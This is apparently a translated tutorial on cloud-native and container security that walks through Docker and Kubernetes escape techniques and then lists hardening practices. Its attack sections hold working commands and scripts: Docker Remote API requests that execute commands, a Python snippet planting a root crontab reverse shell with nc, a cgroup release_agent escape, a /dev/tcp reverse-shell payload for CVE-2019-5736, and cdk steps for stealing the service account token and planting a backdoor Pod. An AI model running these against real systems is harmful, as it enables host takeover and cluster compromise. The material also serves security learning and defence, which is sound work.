
Cloud Native Security

What Is Cloud Native Security

Cloud native is a set of technologies and methodologies. The term combines two words: "cloud" means that the application lives in the cloud rather than in a traditional data center, and "native" means that the application is designed for the cloud environment from the start, so that it runs optimally there and makes full use of the elasticity and distributed nature of the cloud platform.

Representative cloud-native technologies include containers, service meshes, microservices, immutable infrastructure, and declarative APIs.

The 4 Cs of Cloud Native Security

You can think about security in layers. The 4 Cs of Cloud Native Security are Cloud, Cluster, Container, and Code.

Each layer of the cloud-native security model builds on the next outermost layer, and the code layer benefits from a strong underlying security layer (cloud, cluster, container). You cannot protect against poor security standards in the base layer by addressing security at the code layer.

Dividing security by perspective

Build-Deploy-Run

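Before and after an attack

Container attack surface

Gathering information from inside the container

Determining whether the current machine is a Docker container

Check the process with PID 1. If it is the application process itself, the environment is a container. If it is init or systemd, the environment is not necessarily a container, although a container cannot be ruled out: PID 1 of an LXD instance, for example, is /sbin/init.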

ps -p1

Unlike a virtual machine, a container shares the kernel with its host. In theory there is therefore no kernel file inside a container, unless the host's /boot directory has been mounted into it.

KERNEL_PATH=$(cat /proc/cmdline | tr ' ' '\n' | awk -F '=' '/BOOT_IMAGE/{print $2}')
test -e "$KERNEL_PATH" && echo "Not Sure" || echo "Container"

cat /proc/1/cgroup

cat /proc/1/cgroup | grep -qi docker && echo "Docker" || echo "Not Docker"

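Containers use cgroups to enforce resource limits, and each container is placed in its own cgroup. For Docker, the cgroup is named docker-xxxx, where xxxx is the container's UUID. Limiting a container's resources really means limiting the resources of the processes running in it, so the cgroup name of PID 1 inside the container gives us a clue.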
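As an illustration of the cgroup clue, the sketch below extracts a Docker container ID from the text of /proc/1/cgroup. The function name docker_container_id is hypothetical, and the pattern assumes cgroup v1 style paths such as /docker/<id> or docker-<id>.scope; on cgroup v2 hosts the file often contains only "0::/", in which case this check finds nothing.

```python
import re

# Assumption: Docker container IDs are 64 hex characters and appear after
# "docker/" (cgroupfs driver) or "docker-" (systemd driver).
_ID_RE = re.compile(r"docker[-/]([0-9a-f]{64})")


def docker_container_id(cgroup_text):
    """Return the container ID found in /proc/1/cgroup text, or None."""
    match = _ID_RE.search(cgroup_text)
    return match.group(1) if match else None
```

A caller would pass in the result of open("/proc/1/cgroup").read(); a None result does not prove that the process is on a host.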

ls -la /.dockerenv

[[ -f /.dockerenv ]] && echo "Docker" || echo "Not Docker"

sudo readlink /proc/1/exe
# If the result contains "system" (for example, systemd), this is the host

systemd-detect-virt -c
# If it returns "none", this is the host
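The individual checks above can be combined into a single list of hints. This is only a sketch: container_evidence is a hypothetical helper, it takes its inputs as arguments so that it can be tried on sample data, and none of the hints is conclusive on its own.

```python
def container_evidence(pid1_exe, dockerenv_exists, cgroup_text):
    """Collect hints that the current environment is a Docker container."""
    hints = []
    # An init system as PID 1 is inconclusive; anything else suggests a container.
    name = pid1_exe.rsplit("/", 1)[-1]
    if name not in ("init", "systemd"):
        hints.append("PID 1 is %s, not an init system" % name)
    if dockerenv_exists:
        hints.append("/.dockerenv exists")
    if "docker" in cgroup_text.lower():
        hints.append("/proc/1/cgroup mentions docker")
    return hints
```

On a live system the three arguments could come from os.readlink("/proc/1/exe"), os.path.exists("/.dockerenv"), and the contents of /proc/1/cgroup. An empty list means only that none of these particular hints was found.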

Container escape

Docker escape caused by misconfiguration

Unauthorized access to the Docker Remote API

docker swarm

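docker swarm is a tool that turns a cluster of Docker hosts into a single virtual Docker host. It uses the standard Docker API, makes Docker clusters easier to manage and scale, and is provided officially by Docker.

docker swarm manages Docker clusters with a manager/worker model and, by default, communicates over port 2375. It exposes a Docker Remote API service, so Docker can be operated through HTTP requests, Python, or any other API client.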

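Setting up the vulnerable environment

Use vulhub to set up the vulnerable environment: docker daemon api unauthorized access vulnerability

Exploit 1: RCE in a container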

First list the containers to obtain a container ID:

curl -i -s -X GET http://<docker_host>:PORT/containers/json

Then create an exec instance in the target container:

POST /containers/<container_id>/exec HTTP/1.1
Host: <docker_host>:PORT
Content-Type: application/json
Content-Length: 188

{
"AttachStdin": true,
"AttachStdout": true,
"AttachStderr": true,
"Cmd": ["cat", "/etc/passwd"],
"DetachKeys": "ctrl-p,ctrl-q",
"Privileged": true,
"Tty": true
}

The equivalent shell command:

curl -i -s -X POST \
-H "Content-Type: application/json" \
--data-binary '{"AttachStdin": true,"AttachStdout": true,"AttachStderr": true,"Cmd": ["cat", "/etc/passwd"],"DetachKeys": "ctrl-p,ctrl-q","Privileged": true,"Tty": true}' \
http://<docker_host>:PORT/containers/<container_id>/exec

Then start the exec instance, using the Id returned by the previous request:

POST /exec/<exec_id>/start HTTP/1.1
Host: <docker_host>:PORT
Content-Type: application/json

{
"Detach": false,
"Tty": false
}

The equivalent shell command:

curl -i -s -X POST \
-H 'Content-Type: application/json' \
--data-binary '{"Detach": false,"Tty": false}' \
http://<docker_host>:PORT/exec/<exec_id>/start
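The two requests depend on each other: the response to the exec-create call carries an Id field, and that value becomes the <exec_id> in the start call. The sketch below shows this hand-off using only the Python standard library. The function names are hypothetical, the requests are built but not sent, and it is meant for a lab environment that you control.

```python
import json
import urllib.request


def exec_create_request(base_url, container_id, cmd):
    """Build the POST /containers/<id>/exec request (step 1)."""
    body = json.dumps({"AttachStdout": True, "AttachStderr": True, "Cmd": cmd})
    return urllib.request.Request(
        "%s/containers/%s/exec" % (base_url.rstrip("/"), container_id),
        data=body.encode("utf-8"),
        headers={"Content-Type": "application/json"},
        method="POST",
    )


def exec_start_request(base_url, create_response_body):
    """Build the POST /exec/<exec_id>/start request (step 2)."""
    # The exec-create response is a JSON object whose "Id" names the exec instance.
    exec_id = json.loads(create_response_body)["Id"]
    body = json.dumps({"Detach": False, "Tty": False})
    return urllib.request.Request(
        "%s/exec/%s/start" % (base_url.rstrip("/"), exec_id),
        data=body.encode("utf-8"),
        headers={"Content-Type": "application/json"},
        method="POST",
    )
```

Each request object could then be passed to urllib.request.urlopen, with the body of the first response fed into exec_start_request.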

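Exploit 2: RCE on the host

The approach is to start an arbitrary container with the host's /etc directory mounted into it, which lets us read and write any file under that directory. We can then write a command into the crontab configuration file to get a reverse shell.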

import docker

client = docker.DockerClient(base_url='http://your-ip:2375/')
data = client.containers.run('alpine:latest', r'''sh -c "echo '* * * * * /usr/bin/nc your-ip 21 -e /bin/sh' >> /tmp/etc/crontabs/root" ''', remove=True, volumes={'/etc': {'bind': '/tmp/etc', 'mode': 'rw'}})

Exploiting with cdk

Run a command directly with cdk:

./cdk run docker-api-pwn http://127.0.0.1:2375 "touch /host/tmp/docker-api-pwn"

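This mounts the host's root directory / at /host inside a container and then runs the user-supplied command to tamper with host files. For example, writing to /etc/crontab is enough to take over the host.

Reference: Exploit: docker api pwn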

Dangerous Docker startup flag --privileged: starting a container in privileged mode

Cause

When the operator executes docker run --privileged, Docker allows the container to access all devices on the host and also adjusts the AppArmor or SELinux configuration so that the container has almost the same access rights as processes running directly on the host.

Environment setup

sudo docker run -itd --privileged ubuntu:latest /bin/bash

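Exploitation

List the disk partitions: fdisk -l
Create a directory to use as a mount point: mkdir /aa
Mount the host's /dev/sda1 device at /aa inside the container: mount /dev/sda1 /aa
You can then write files to obtain privileges or data.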

Using cdk:

./cdk run mount-disk

Dangerous Docker startup flag --cap-add=SYS_ADMIN

Docker uses Linux namespaces to isolate six kinds of resources: hostname, user privileges, file system, network, process IDs, and inter-process communication. However, some startup flags grant the container greater permissions and so break through these isolation boundaries.

--cap-add=SYS_ADMIN  allows privileged operations such as mount; exploiting it requires a resource that can be mounted
--net=host  bypasses the network namespace
--pid=host  bypasses the PID namespace
--ipc=host  bypasses the IPC namespace
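From the defensive side, a docker run command line can be screened for the flags listed above before it is executed. The sketch below is a minimal illustration: RISKY_FLAGS and risky_run_flags are hypothetical names, and matching is exact and case-sensitive, so it should be read as a starting point rather than a complete policy check.

```python
RISKY_FLAGS = {
    "--cap-add=SYS_ADMIN": "allows mount and other privileged operations",
    "--net=host": "bypasses the network namespace",
    "--pid=host": "bypasses the PID namespace",
    "--ipc=host": "bypasses the IPC namespace",
}


def risky_run_flags(argv):
    """Return (flag, reason) pairs for risky flags found in a docker run argv."""
    normalized = []
    it = iter(argv)
    for arg in it:
        # Accept both "--flag=value" and "--flag value" spellings.
        if arg in ("--cap-add", "--net", "--network", "--pid", "--ipc"):
            arg = "%s=%s" % (arg, next(it, ""))
        # --network is the long form of --net.
        if arg.startswith("--network="):
            arg = "--net=" + arg.split("=", 1)[1]
        normalized.append(arg)
    return [(a, RISKY_FLAGS[a]) for a in normalized if a in RISKY_FLAGS]
```

For example, passing ["docker", "run", "--pid", "host", "ubuntu"] reports the --pid=host flag together with its reason.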

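Prerequisites:

The process runs as root inside the container
The container runs with the SYS_ADMIN Linux capability
The container has no AppArmor profile, or otherwise allows the mount syscall
The cgroup v1 virtual file system is mounted read-write inside the container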
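The second prerequisite can be checked from inside a container by reading the CapEff line of /proc/self/status and testing the CAP_SYS_ADMIN bit, which is bit 21 in linux/capability.h. The helper names below are hypothetical; this is a sketch that works on text passed in by the caller.

```python
CAP_SYS_ADMIN = 21  # bit index of CAP_SYS_ADMIN in linux/capability.h


def cap_eff_from_status(status_text):
    """Extract the CapEff hex value from the text of /proc/<pid>/status."""
    for line in status_text.splitlines():
        if line.startswith("CapEff:"):
            return line.split(":", 1)[1].strip()
    return None


def has_cap_sys_admin(cap_eff_hex):
    """Return True if the effective capability mask includes CAP_SYS_ADMIN."""
    return bool((int(cap_eff_hex, 16) >> CAP_SYS_ADMIN) & 1)
```

A caller would read /proc/self/status, pass the text to cap_eff_from_status, and then pass the resulting mask to has_cap_sys_admin.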

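We need a cgroup in which we can write the notify_on_release file (to enable cgroup notifications). Mount a cgroup controller and create a child cgroup, start a /bin/sh process and write its PID to the child's cgroup.procs file, and when sh exits the kernel runs the program named in the release_agent file.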

# On the host
docker run --rm -it --cap-add=SYS_ADMIN --security-opt apparmor=unconfined ubuntu bash
# In the container
mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp && mkdir /tmp/cgrp/x

echo 1 > /tmp/cgrp/x/notify_on_release
host_path=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab`
echo "$host_path/cmd" > /tmp/cgrp/release_agent

echo '#!/bin/sh' > /cmd
echo "ls > $host_path/output" >> /cmd
chmod a+x /cmd
sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"

View the output file

ls /tmp/cgrp
cat /output

Docker escape caused by dangerous mounts

Mounting a directory (-v /:/soft)

docker run -itd -v /dir:/dir ubuntu:18.04 /bin/bash

Mounting the Docker socket

Reproducing the escape

docker run -itd -v /var/run/docker.sock:/var/run/docker.sock ubuntu

Install the Docker client inside the container:

apt-get update
apt-get install \
apt-transport-https \
ca-certificates \
curl \
gnupg-agent \
software-properties-common
curl -fsSL https://mirrors.ustc.edu.cn/docker-ce/linux/ubuntu/gpg | apt-key add -
apt-key fingerprint 0EBFCD88
add-apt-repository \
"deb [arch=amd64] https://mirrors.ustc.edu.cn/docker-ce/linux/ubuntu/ \
$(lsb_release -cs) \
stable"
apt-get update
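apt-get install docker-ce docker-ce-cli containerd.io

From inside the container, start a new container with the host's root directory mounted at /host:

docker run -it -v /:/host ubuntu:18.04 /bin/bash

Then switch the root to the host file system:

chroot /host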

Run a command with the cdk tool:

./cdk run docker-sock-pwn /var/run/docker.sock "touch /host/tmp/pwn-success"

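Mounting the procfs directory

About procfs

procfs is a pseudo file system that dynamically reflects the state of processes and other components in the system, and it contains many highly sensitive files. Mounting the host's procfs into an untrusted container is therefore very dangerous, especially when the container runs as root by default and user namespaces are not enabled.

The exploitation process is fairly complex, but cdk makes it quick. For example:

  1. On the host, start a test container with the host's procfs mounted, from which to attempt the escape: docker run -v /root/cdk:/cdk -v /proc:/mnt/host_proc --rm -it ubuntu bash
  2. Inside the container, run ./cdk run mount-procfs /mnt/host_proc "touch /tmp/exp-success"
  3. The file /tmp/exp-success appears on the host, which shows that the exploit succeeded and that the attacker can run arbitrary commands on the host.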

Reference: Exploit: mount procfs

Mounting the cgroup directory

Exploiting with cdk

./cdk run mount-cgroup "<shell-cmd>"
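The mounts covered in this section (the host root, the Docker socket, procfs, and the cgroup directory) can be flagged before a container is started. The sketch below checks the host side of -v specifications against a short list. SENSITIVE_SOURCES and risky_mounts are hypothetical names, /sys/fs/cgroup is assumed to be the host's cgroup mount point, and the list is deliberately not exhaustive.

```python
# Assumption: these host paths stand for the mounts discussed in this section.
SENSITIVE_SOURCES = ("/", "/proc", "/var/run/docker.sock", "/sys/fs/cgroup")


def risky_mounts(volume_specs):
    """Return the -v specs whose host side is one of the sensitive paths."""
    flagged = []
    for spec in volume_specs:
        source = spec.split(":", 1)[0]
        # Normalize trailing slashes but keep the root path as "/".
        source = source.rstrip("/") or "/"
        if source in SENSITIVE_SOURCES:
            flagged.append(spec)
    return flagged
```

A stricter version would also resolve symlinks such as /run/docker.sock and treat subdirectories of sensitive paths as risky.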

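Docker escape caused by program vulnerabilities

CVE-2019-5736 runc container escape vulnerability

Vulnerability details

Docker, containerd, and other runc-based container runtimes are affected by this vulnerability. Through a crafted container image or an exec operation, an attacker can obtain the file handle of the host's runc binary while it is executing and overwrite that binary, thereby gaining root code execution on the host.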

Affected versions

Docker version < 18.09.2
runc version <= 1.0-rc6
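The Docker bound above can be turned into a quick version check. The sketch below compares a version string against 18.09.2; the function names are hypothetical, and since distributions sometimes backport fixes without changing the upstream version number, the result is only a first indication.

```python
import re


def version_tuple(version):
    """Turn '18.09.2' or '18.06.1-ce' into a comparable tuple of ints."""
    return tuple(int(part) for part in re.findall(r"\d+", version.split("-")[0]))


def docker_affected_by_cve_2019_5736(docker_version):
    """True if the Docker version is below 18.09.2, the bound given above."""
    return version_tuple(docker_version) < (18, 9, 2)
```

The version string could come from the output of docker version --format '{{.Server.Version}}'.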

Exploitation steps

Using the PoC:

POC: CVE-2019-5736-PoC

vi main.go
payload = "#!/bin/bash \n bash -i >& /dev/tcp/192.168.172.136/1234 0>&1"

CGO_ENABLED=0 GOOS=linux GOARCH=amd64 go build main.go

CVE-2019-14271 Docker cp command container escape attack vulnerability

Vulnerability details

When docker cp is used on the host, it calls a helper process, docker-tar, which is not containerized and dynamically loads several libnss.so libraries at runtime. An attacker can inject code into docker-tar by replacing libraries such as libnss.so inside the container. When a Docker user then tries to copy a file from the container, the malicious code runs, escaping the container and gaining root privileges on the host.

Affected versions

Docker 19.03.0

Vulnerability Reference

Docker Patched the Most Severe Copy Vulnerability to Date With CVE-2019-14271

CVE-2019-13139 Docker build code execution

Vulnerability Reference

CVE-2019-13139 - Docker build code execution

Docker escape caused by kernel vulnerabilities

Dirty Cow (CVE-2016-5195): Docker escape through the Dirty Cow vulnerability

Vulnerability Description

Dirty Cow (CVE-2016-5195) is a privilege escalation vulnerability in the Linux kernel. It can be used to escape from a Docker container and obtain a root shell on the host.

Docker containers share the kernel with the host, so the escape only works when the host kernel is vulnerable to Dirty Cow.

Vulnerability reproduction

Environment acquisition: git clone https://github.com/gebl/dirtycow-docker-vdso.git

Using the CDK tool

CDK : https://github.com/cdk-team/CDK

Copy to container

# host
docker cp /Users/ljluestc/Downloads/cdk_linux_amd64 e39eb7abd9e6:/root

# Container
cd /root
mv cdk_linux_amd64 cdk
chmod 777 cdk

Common commands

# Information collection
cdk evaluate

# List all exploits
cdk run --list

# Run the specified exploit
cdk run <script-name> [options]

Kubernetes (k8s) security issues

The checks performed by cdk evaluate give an overview of k8s security issues.

Pitfalls when setting up k8s

Reference:

  • First install k8s through docker-desktop, refer to: https://github.com/maguowei/k8s-docker-desktop-for-mac
  • Install the Kubernetes dashboard: kubectl apply -f https://raw.githubusercontent.com/kubernetes/dashboard/v2.2.0/aio/deploy/recommended.yaml
  • Enable local proxy kubectl proxy
  • Visit http://localhost:8001/api/v1/namespaces/kubernetes-dashboard/services/https:kubernetes-dashboard:/proxy/
  • Get the token in the following steps
  • Install helm
    1. brew install helm
    2. helm repo add stable http://mirror.azure.cn/kubernetes/charts/
    3. helm repo update
    4. helm install my-mysql stable/mysql
  • Create a user:

    kubectl apply -f dashboard-adminuser.yaml

    The content of dashboard-adminuser.yaml is as follows:

    apiVersion: v1
    kind: ServiceAccount
    metadata:
      name: admin-user
      namespace: kube-system

    Get token

    kubectl -n kube-system describe secret $(kubectl -n kube-system get secret | grep admin-user | awk '{print $1}')

    kube-proxy boundary bypass (CVE-2020-8558)

    An attacker in a container on the node, or on an adjacent host in the same LAN (the same Layer 2 domain), may be able to reach TCP/UDP services that are bound to 127.0.0.1 on the node.

    For a detailed introduction, refer to: CVE-2020-8558: Kubernetes local host boundary bypass vulnerability notice

    List services that may be affected:

    lsof +c 15 -P -n -i4TCP@127.0.0.1 -sTCP:LISTEN
    lsof +c 15 -P -n -i4UDP@127.0.0.1
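Where lsof is not installed, roughly the same TCP information can be read from /proc/net/tcp. The sketch below parses that file's text and returns the ports that are listening on 127.0.0.1. The function name is hypothetical, it covers IPv4 TCP only, and it assumes the little-endian address encoding used on x86, where 127.0.0.1 appears as 0100007F.

```python
def localhost_listeners(proc_net_tcp_text):
    """Return the TCP ports in LISTEN state bound to 127.0.0.1."""
    ports = []
    for line in proc_net_tcp_text.splitlines()[1:]:  # skip the header row
        fields = line.split()
        if len(fields) < 4:
            continue
        local_addr, state = fields[1], fields[3]
        ip_hex, port_hex = local_addr.split(":")
        # 0100007F is 127.0.0.1 in little-endian hex; state 0A means LISTEN.
        if ip_hex == "0100007F" and state == "0A":
            ports.append(int(port_hex, 16))
    return sorted(ports)
```

A caller would pass in the contents of /proc/net/tcp read on the node.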

    K8s Api-server

    Check the environment variables to determine whether the current container belongs to a K8s Pod, obtain the address of the K8s api-server, and try to log in anonymously. If that succeeds, the K8s cluster can be taken over directly through the api-server.

    Reference: https://github.com/cdk-team/CDK/wiki/Evaluate:-K8s-API-Server

    The precondition is that the cluster permits anonymous access with useful permissions, which a default setup does not grant. If this problem exists, you can use cdk kcurl anonymous to send an HTTP request.

    K8s Service Account

    In a Pod created by a K8s cluster, the K8s Service Account credential (/run/secrets/kubernetes.io/serviceaccount/token) is mounted inside the container by default. CDK uses this credential to authenticate to the K8s api-server and access an interface that requires high privileges. If the request succeeds, the account has high privileges, and the Service Account can be used directly to manage the K8s cluster.
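To make the mechanism concrete, the sketch below shows how a process inside a Pod could locate the api-server from the KUBERNETES_SERVICE_HOST and KUBERNETES_SERVICE_PORT environment variables and attach the Service Account token as a bearer token. The function names are hypothetical, and the request is built but not sent.

```python
import urllib.request

TOKEN_PATH = "/run/secrets/kubernetes.io/serviceaccount/token"


def api_server_url(env):
    """Build the api-server base URL from the Pod's environment variables."""
    host = env.get("KUBERNETES_SERVICE_HOST")
    port = env.get("KUBERNETES_SERVICE_PORT", "443")
    return "https://%s:%s" % (host, port) if host else None


def authenticated_request(base_url, path, token):
    """Build a GET request that presents the Service Account token."""
    return urllib.request.Request(
        base_url + path,
        headers={"Authorization": "Bearer " + token.strip()},
    )
```

Inside a Pod, env would be os.environ and token the contents of TOKEN_PATH. Sending the request over TLS would also need the cluster CA certificate, which is mounted next to the token as ca.crt.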

    Use cdk to connect to the K8s api-server and send a custom HTTP request:

    1. Use cdk evaluate to determine whether this problem exists.
    2. Get the address of the K8s api-server.
    3. Send the request with cdk kcurl.

    [Screenshots of the test and of each step are not included.]

    Then use CDK to deploy a backdoor Pod and a shadow K8s api-server.

    Container Security Best Practices

    This part is translated from the Internet and will be sorted out later.

    • Container
    1. Always use the latest version of Docker
    2. Only allow trusted users to control the Docker daemon
    3. Ensure that audit rules are in place for the following:
      1. Docker daemon
      2. /var/lib/docker
      3. /etc/docker
      4. Docker.service
      5. Docker.socket
      6. /etc/default/docker
      7. /etc/docker/daemon.json
      8. /etc/sysconfig/docker
      9. /usr/bin/containerd
      10. /usr/sbin/runc
  • Ensure all Docker files and directories are owned by an appropriate user (usually root) and set their file permissions to restrictive values to protect all Docker files and directories
  • Use a registry with a valid registry certificate or a registry that uses TLS to minimize the risk of traffic interception.
  • If you are using containers that do not have an explicit container user defined in the image, you should enable user namespace support, which will allow you to remap container users to host users.
  • Prevent the container from acquiring new privileges. By default, containers are allowed to acquire new privileges, so this configuration must be set explicitly. Another step you can take to minimize privilege escalation attacks is to remove setuid and setgid permissions from the image.
  • Run the container as a non-root user (UID not 0). By default, containers run as the root user inside the container.
  • When building containers, use only trusted base images.
  • Use a minimal base image that does not contain unnecessary packages that could lead to a larger attack surface.
  • Implement strong governance policies to enforce frequent image scanning.
  • Build a workflow that periodically identifies and removes stale or unused images and containers from the host.
  • Do not store secrets in the image/Dockerfile. By default, you are allowed to store secrets in a Dockerfile, but storing a secret in an image will make the secret accessible to any user of that image.
  • When running a container, remove any capabilities that are not required for the container to function as desired.
  • Do not run containers with the --privileged flag, as this type of container will have most of the capabilities available to the underlying host. This flag also overrides any rules you have set with --cap-drop or --cap-add. In addition, run containers with --security-opt=no-new-privileges to prevent privilege escalation through setuid or setgid binaries.
  • Do not mount sensitive host system directories on containers, especially in writable mode, as this may expose them to malicious changes that could compromise the host.
  • Don't run sshd inside the container. By default, the ssh daemon does not run in a container, and you should not install it; this simplifies security management of the SSH server.
  • Do not map privileged ports (those below 1024) inside the container, as they typically carry sensitive data. By default, Docker maps container ports to host ports in the range 49153-65535, but it also allows mapping to privileged ports. As a general rule of thumb, make sure you only open the ports you need on your containers.
  • Do not share the host's network namespace, process namespace, IPC namespace, user namespace, or UTS namespace unless necessary to ensure proper isolation between Docker containers and the underlying host.
  • Specify the amount of memory and CPU the container needs to run as designed, rather than relying on arbitrary amounts. By default, Docker containers share their resources equally without restriction.
  • Set the container's root filesystem to read-only. Once running, the container does not need to change the root filesystem. Any changes made to the root filesystem may be for malicious purposes. In order to preserve container immutability - not patching a new container but recreating it from a new image - you should not make the root filesystem writable.
  • Impose PID limits. One of the advantages of containers is strict process identifier (PID) control. Every process in the kernel has a unique PID, and containers use the Linux PID namespace to give each container a separate view of the PID hierarchy. Setting a PID limit caps the number of processes that can run in each container, which prevents unbounded process spawning and hinders malicious lateral movement. It also protects against fork bombs (processes that keep replicating themselves) and runaway processes. If your service always runs a fixed number of processes, setting the PID limit to exactly that number can mitigate many malicious behaviors, including reverse shells and remote code injection.
  • Do not configure your mount propagation rules to share. Shared mount propagation means that any changes made to a mount will be propagated to all instances of that mount. Instead, set mount propagation to slave or private mode so that necessary changes to the volume are not shared with (or propagated to) containers that do not require the change.
  • Do not use the docker exec command with the --privileged or --user=root options, as these give the exec'd process extended Linux capabilities or root privileges inside the container.
  • Do not use the default bridge "docker0". The default bridge leaves containers exposed to ARP spoofing and MAC flooding attacks. Instead, attach containers to a user-defined network.
  • Do not mount the Docker socket inside the container, as this approach will allow the process inside the container to execute commands, giving it complete control over the host machine.
  • Disallow inter-container communication (--icc=false)
  • Use Linux security modules (seccomp, AppArmor or SELinux)
  • Limit resources (memory, CPU, file descriptors, processes, restarts)
  • Make filesystems and volumes read-only
  • Set logging level to at least INFO
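Several of the practices above map directly onto docker run flags. The sketch below assembles such a command line as an argument list. The function name and the default values (UID 1000, 256 MB of memory, half a CPU, 100 PIDs) are illustrative assumptions rather than recommendations for any particular workload.

```python
def hardened_run_args(image, user="1000:1000", memory="256m", cpus="0.5", pids=100):
    """Build a docker run argv that applies several of the practices above."""
    return [
        "docker", "run", "--rm",
        "--user", user,                        # run as a non-root UID
        "--read-only",                         # read-only root filesystem
        "--cap-drop=ALL",                      # drop all capabilities by default
        "--security-opt=no-new-privileges",    # block setuid/setgid escalation
        "--pids-limit", str(pids),             # cap the number of processes
        "--memory", memory, "--cpus", cpus,    # explicit resource limits
        image,
    ]
```

The list can be passed to subprocess.run. A workload that needs a specific capability or a writable path would add it back explicitly, for example with --cap-add or --tmpfs.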
    • Kubernetes Security Best Practices
    1. For RBAC, specify your Roles and ClusterRoles for specific users or user groups instead of granting cluster-admin privileges to any user or user group.
    2. Avoid duplicating permissions when using Kubernetes RBAC, as doing so may cause operational issues.
    3. Delete unused or inactive RBAC roles to focus on active roles when troubleshooting failures or investigating security incidents.
    4. Use Kubernetes network policies to isolate your pods and explicitly allow the communication paths required for your application to function properly. Otherwise, you have both lateral and north-south threats.
    5. If your pod requires internet access (ingress or egress), create an appropriate network policy to enforce proper network segmentation/firewall rules, then create a label for that network policy, and finally associate your pod with that label.
    6. Using the PodSecurityPolicy admission controller can ensure that proper management policies are enforced. PodSecurityPolicy controllers can prevent containers from running as root, or ensure that a container's root filesystem is mounted read-only (these suggestions sound familiar, since they were all on the previous list of Docker actions to take).
    7. Use a Kubernetes admission controller to enforce image registry management policies so that all images fetched from untrusted registries are automatically rejected.
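The registry rule in the last item comes down to a small decision: extract the registry from an image reference and compare it with an allowlist. In a real cluster this logic would sit behind an admission webhook or a policy engine. The sketch below shows only the decision itself, with hypothetical function names, and it assumes Docker's convention that a reference without a registry host refers to docker.io.

```python
def image_registry(image):
    """Return the registry part of an image reference (docker.io if omitted)."""
    first, _, rest = image.partition("/")
    # The first component counts as a registry host only if it looks like one:
    # it contains a dot or a port, or it is exactly "localhost".
    if rest and ("." in first or ":" in first or first == "localhost"):
        return first
    return "docker.io"


def image_allowed(image, trusted_registries):
    """True if the image's registry is in the trusted set."""
    return image_registry(image) in trusted_registries
```

For example, with a trusted set containing only the made-up host registry.example.com, the image ubuntu:18.04 would be rejected because it resolves to docker.io.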